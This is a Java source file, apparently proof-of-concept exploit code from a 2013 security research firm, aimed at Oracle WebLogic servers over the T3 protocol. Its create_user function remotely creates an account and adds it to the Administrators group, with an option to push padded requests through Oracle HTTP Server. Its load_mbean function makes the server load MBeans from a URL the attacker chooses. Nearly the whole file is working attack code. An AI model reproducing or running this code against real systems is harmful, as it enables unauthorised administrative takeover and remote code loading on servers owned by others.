/*## (c) SECURITY EXPLORATIONS    2013 poland                                #*/
/*##     http://www.security-explorations.com                                #*/

/* THIS SOFTWARE IS PROTECTED BY DOMESTIC AND INTERNATIONAL COPYRIGHT LAWS    */
/* UNAUTHORISED COPYING OF THIS SOFTWARE IN EITHER SOURCE OR BINARY FORM IS   */
/* EXPRESSLY FORBIDDEN. ANY USE, INCLUDING THE REPRODUCTION, MODIFICATION,    */
/* DISTRIBUTION, TRANSMISSION, RE-PUBLICATION, STORAGE OR DISPLAY OF ANY      */
/* PART OF THE SOFTWARE, FOR COMMERCIAL OR ANY OTHER PURPOSES REQUIRES A      */
/* VALID LICENSE FROM THE COPYRIGHT HOLDER.                                   */

/* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS    */
/* OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,*/
/* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL    */
/* SECURITY EXPLORATIONS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, */
/* WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF  */
/* OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE     */
/* SOFTWARE.                                                                  */

import java.lang.*;
import java.lang.reflect.*;
import java.net.*;
import java.io.*;
import java.rmi.*;
import java.util.*;
import javax.management.*;

public class WLS {
 public static final int OHS_BUFSIZE            = 0x1000;

 public static final int TRY_COUNT              = 20;

 public static final int OID_REMOTE_MBEANSERVER = 0x0102;

 public static byte[] create_user(String hostname,int port,boolean secure,int oid,String user,String pass,String desc,boolean ohs) {
  byte resp[]=null;

  try {
   if (oid<=0) oid=OID_REMOTE_MBEANSERVER;

   byte msg1[]=T3Proto.get_identify_request();
   byte msg2[]=T3Proto.get_createUser_request(oid,user,pass,desc);
   byte msg3[]=T3Proto.get_addMemberToGroup_request(oid,"Administrators",user);

   byte bootstrap[]=null;

   if (ohs) {
    int total=msg1.length+msg2.length+msg3.length+2*OHS_BUFSIZE;
    bootstrap=T3Proto.get_bootstrap_msg(secure,"/em",total);

    byte lfbuf[]=new byte[OHS_BUFSIZE];
    for(int i=0;i<lfbuf.length;i++) {
     lfbuf[i]=10;
    }   

    boolean finished=false;

    while(!finished) {
     for(int k=0;k<TRY_COUNT;k++) {
      Socket socket=(Socket)WebUtils.connect(hostname,port,secure);
      OutputStream out=socket.getOutputStream();        
      InputStream in=socket.getInputStream();

      out.write(bootstrap);
      out.write(lfbuf);

      out.write(msg1);
      out.write(msg2);
      out.write(msg3);

      out.write(lfbuf);
     }

     Socket socket=(Socket)WebUtils.connect(hostname,port,secure);
     OutputStream out=socket.getOutputStream();        
     InputStream in=socket.getInputStream();

     String msg="GET /weblogic/bea_wls_diagnostics/accessor?logicalName=ServerLog HTTP/1.1\n";
     msg+="Host:"+hostname+":"+port+"\n";
     msg+="username:"+user+"\n";
     msg+="password:"+pass+"\n";

     msg+="\n";
     out.write(msg.getBytes());

     DataInputStream dis=new DataInputStream(in);
     String line=dis.readLine();

     System.out.println(line);

     if (line.indexOf("200 OK")>0) {
      finished=true;
      System.out.println("");
      System.out.println(line);
     }
    }
   } else {
    Socket socket=(Socket)WebUtils.connect(hostname,port,secure);
    OutputStream out=socket.getOutputStream();        
    InputStream in=socket.getInputStream();

    bootstrap=T3Proto.get_bootstrap_msg(secure,null,-1);

    out.write(bootstrap);
    T3Proto.read_bootstrap_resp(in);

    out.write(msg1);
    T3Proto.read_resp(in);

    out.write(msg2);
    T3Proto.read_resp(in);

    out.write(msg3);
    resp=T3Proto.read_resp(in);
   }
  } catch(Throwable t) {}

  return resp;
 }

 public static byte[] load_mbean(String hostname,int port,boolean secure,int oid,String name,String url,boolean ohs) {
  byte resp[]=null;

  try {
   if (oid<=0) oid=OID_REMOTE_MBEANSERVER;

   byte msg1[]=T3Proto.get_identify_request();
   byte msg2[]=T3Proto.get_createMBeanMLet_request(oid,name);
   byte msg3[]=T3Proto.get_getMBeansFromURL_request(oid,name,url);

   byte bootstrap[]=null;

   if (ohs) {
    int total=msg1.length+msg2.length+msg3.length+2*OHS_BUFSIZE;
    bootstrap=T3Proto.get_bootstrap_msg(secure,"/em",total);

    byte lfbuf[]=new byte[OHS_BUFSIZE];
    for(int i=0;i<lfbuf.length;i++) {
     lfbuf[i]=10;
    }   

    for(int k=0;k<TRY_COUNT;k++) {
     Socket socket=(Socket)WebUtils.connect(hostname,port,secure);
     OutputStream out=socket.getOutputStream();        
     InputStream in=socket.getInputStream();

     out.write(bootstrap);
     out.write(lfbuf);

     out.write(msg1);
     out.write(msg2);
     out.write(msg3);

     out.write(lfbuf);
    }
   } else {
    Socket socket=(Socket)WebUtils.connect(hostname,port,secure);
    OutputStream out=socket.getOutputStream();        
    InputStream in=socket.getInputStream();

    bootstrap=T3Proto.get_bootstrap_msg(secure,null,-1);

    out.write(bootstrap);
    T3Proto.read_bootstrap_resp(in);

    out.write(msg1);
    T3Proto.read_resp(in);

    out.write(msg2);
    T3Proto.read_resp(in);

    out.write(msg3);
    resp=T3Proto.read_resp(in);
   }
  } catch(Throwable t) {}

  return resp;
 }

}
